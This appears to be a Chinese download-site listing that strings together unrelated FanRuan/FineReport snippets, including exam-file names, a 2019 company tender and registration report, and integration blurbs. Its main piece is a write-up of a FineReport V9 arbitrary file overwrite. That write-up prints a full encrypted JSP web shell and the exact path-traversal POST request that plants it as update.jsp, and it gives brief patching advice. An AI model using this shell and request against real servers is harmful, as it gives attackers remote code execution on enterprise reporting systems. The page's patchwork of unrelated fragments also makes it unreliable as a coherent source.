个人资源不要乱下载哦，不然概不负责。

### 帆软V9getshell1：任意文件覆盖与JSP Web Shell植入详解 #### 一、背景介绍 帆软软件有限公司（FineSoft）是中国领先的企业级报表工具及商业智能解决方案提供商，其核心产品之一为FineReport报表设计工具。在2023年某次安全研究中发现了一个严重安全漏洞——任意文件覆盖（Arbitrary File Overwrite），该漏洞允许攻击者通过特定的操作路径上传恶意JSP脚本到目标服务器上，进而获得服务器权限。这一漏洞被命名为“帆软V9getshell1”。 #### 二、漏洞原理 ##### 2.1 任意文件覆盖机制 任意文件覆盖是指攻击者能够替换或修改服务器上的现有文件。在帆软报表系统的实现中，存在一处逻辑缺陷使得攻击者可以利用该功能来覆盖特定的JSP文件。 ##### 2.2 JSP马的上传与执行 1. **文件路径构造**：攻击者通过精心构造请求中的`filePath`参数，指向一个合法的JSP文件路径。例如，攻击者可以通过设置`filePath`为`../../../../WebReport/update.jsp`，将恶意代码写入到`WebReport`目录下的`update.jsp`文件中。 2. **恶意JSP代码**：攻击者准备了如下恶意JSP代码： ```jsp <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%> <% class U extends ClassLoader{ U(ClassLoader c){ super(c); } public Class g(byte []b){ return super.defineClass(b,0,b.length); } } if(request.getParameter("pass")!=null) { String k=(""+UUID.randomUUID()).replace("-", "").substring(16); session.putValue("u",k); out.print(k); return; } Cipher c=Cipher.getInstance("AES"); c.init(2,new SecretKeySpec((session.getValue("u")+ "").getBytes(),"AES")); new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext); %> ``` 该代码实现了以下功能： - 通过`request.getParameter("pass")`判断是否接收到触发命令。 - 使用AES加密算法对会话中的密钥进行初始化，并解码用户发送的数据。 - 动态加载并执行解密后的类文件，实现远程代码执行。 3. **HTTP请求示例**：攻击者通过发送如下POST请求将恶意代码写入指定位置： ``` POST /WebReport/ReportServer? op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp HTTP/1.1 Host: 192.168.169.138:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36 Connection: close Accept-Au: 0c42b2f264071be0507acea1876c74 Content-Type: text/xml;charset=UTF-8 Content-Length: 675 {"__CONTENT__":"<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%>......","__CHARSET__":"UTF-8"} ``` 4. **利用Tomcat自带的JSP文件**：由于帆软报表系统通常部署在Apache Tomcat服务器上，攻击者可以利用Tomcat默认存在的JSP文件（例如`/tomcat-7.0.96/webapps/ROOT/index.jsp`）作为切入点，通过覆盖这些文件来植入恶意代码。 #### 三、修复建议 1. **升级补丁**：及时安装官方发布的最新版本或安全补丁，以修复已知的安全问题。 2. **限制文件路径**：对用户提交的文件路径进行严格的验证和过滤，避免攻击者通过构造恶意路径覆盖敏感文件。 3. **加强认证与授权**：对关键操作增加二次验证机制，限制非授权用户的访问权限，确保只有经过身份验证的用户才能执行敏感操作。 4. **审计日志记录**：开启并维护详细的审计日志，以便在发生异常情况时进行追踪和分析。 #### 四、总结 帆软V9getshell1这一漏洞揭示了在开发过程中忽视输入验证和权限控制所带来的潜在风险。企业应高度重视此类安全问题，并采取有效措施降低被攻击的风险。同时，用户也应增强安全意识，避免在不安全的网络环境中使用重要系统和服务。

linux系统帆软report11版本预安装包，不需要安装jdk，解压至对应目录即可，然后在startup.sh就行

帆软FCRP官网模拟题

有个5个文件，适合初学者都输选择题 【New】DAY1_创建分析主题.docx 【New】DAY2_组件交互.docx 【New】DAY3_可视化专题.docx 【New】DAY4_数据编辑专题.docx 【New】DAY5_函数专题.docx

每日 条信息更新，多维度检索、企业资 80000+ 质匹配、甲方监控等功能，让中标快人一步！ www.bidizhaobiao.com 本报告于 2019年12月2日 生成 1/9 www.bidizhaobiao.com 招标投标企业报告 帆软软件有限公司 每日 条信息更新，多维度检索、企业资 80000+ 质匹配、甲方监控等功能，让中标快人一步！ www.bidizhaobiao.com 本报告于 2019年12月2日 生成 2/9 www.bidizhaobiao.com 本报告于 2019年12月2日 生成 您所看到的报告内容为截至该时间点该公司的数据快照 目录 1. 基本信息：工商信息 2. 招投标情况：中标/投标数量、中标/投标情况、中标/投标行业分布、参与投标 的甲方排名、合作甲方排名 3. 股东及出资信息 4. 风险信息：经营异常、股权出资、动产抵押、税务信息、行政处罚 5. 企业信息：工程人员、企业资质 * 敬启者：本报告内容是中国比地招标网接收您的委托，查询公开信息所得结果。中国比地招标网不对该查询结果的全面、准确、真 实性负责。本报告应仅为您的决策提供参考。 每日 条信息更新，多维度检索、企业资 80000+ 质匹配、甲方监控等功能，让中标快人一步！ www.bidizhaobiao.com 本报告于 2019年12月2日 生成 3/9 www.bidizhaobiao.com 一、基本信息 1. 工商信息 企业名称： 帆软软件有限公司 统一社会信用代码： 91320205MA1X04R87F 工商注册号： / 组织机构代码： MA1X04R87 法定代表人： 薛爱华 成立日期： 2018-08-02 企业类型： 有限责任公司（自然人投资或控股的法人独资） 经营状态： 存续 注册资本： 5000万人民币 注册地址： 无锡市锡山区安镇街道丹山路78号锡东创融大厦A座303-54 营业期限： 2018-08-02 至 / 营业范围： 计算机、软件及辅助设备的技术开发、技术咨询、技术服务、技术转让、销售；计算机系统集 成；商务咨询（不含投资咨询、不含期货、证券）；企业管理咨询；市场调查；设计、制作、 代理和发布国内广告业务；展览展示服务；会务服务；场地租赁服务（不含融资租赁）；面向 成年人开展的培训（不含国家统一认可的职业证书类培训）；自营和代理各类商品及技术的进 出口业务，但国家限定企业经营或禁止进出口的商品和技术除外。（依法须经批准的项目，经 相关部门批准后方可开展经营活动） 联系电话： *********** 二、招投标分析 2.1 中标/投标数量 企业中标/投标数： 个 （数据统计时间：2017年至报告生成时间） 26 每日 条信息更新，多维度检索、企业资 80000+ 质匹配、甲方监控等功能，让中标快人一步！ www.bidizhaobiao.com 本报告于 2019年12月2日 生成 4/9 www.bidizhaobiao.com 2.2 中标/投标情况（近一年） 企业近十二个月中，中标/投标最多的月份为 ，该月份共有 个投标项目。 2019年11月 9 仅展示最近10条投标项目 序号 地区 日期 标题 中标情况 1 南宁 2019-11-28 数字广投"2019年第一批项目第V标段 中标 2 南宁 2019-11-28 数字广投"2019年第一批项目第V标段 中标 3 南宁 2019-11-28 数字广投"2019年第一批项目第I标段 中标 4 南宁 2019-11-28 数字广投"2019年第一批项目第I标段 中标 5 宁波 2019-11-25 浙江大学宁波理工学院采购敏捷型ERP-MES实践教学系统项目 中标 6 宁波 2019-11-25 浙江大学宁波理工学院采购敏捷型ERP-MES实践教学系统项目 中标 7 广东 2019-11-13 广发银行(总行)数据收集及展示软件采购项目 中标 8 全国 2019-11-12 数据收集及展示软件采购 中标 9 丰台 2019-11-06 高速公路公司运营管理平台建设项目(报表软件采购) 中标 10 泸州 2019-10-28 泸州老窖集团有限责任公司数据可视化平台软件项目 中标 2.3 中标/投标行业分布（近一年） 每日 条信息更新，多维度检索、企业资 80000+ 质匹配、甲方监控等功能，让中标快人一步！ www.bidizhaobiao.com 本报告于 2019年12月2日 生成 5/9 www.bidizhaobiao.com 【软件开发】 （ ） 15 仅展示最近10条投标项目 序号 地区 日期 标题 中标情况 1 宁波 2019-11-25 浙江大学宁波理工学院采购敏捷型ERP-MES实践教学系统项目 中标 2 宁波 2019-11

帆软FCRP官网模拟题

FineReport与泛微OA集成方案，有详细的讲解与实施介绍。

这里web项目使用帆软报表要使用的jar包，有8版本和9版本，看自己需要引入。

报表-帆软-MES-生产-人员工时-维修记录等报表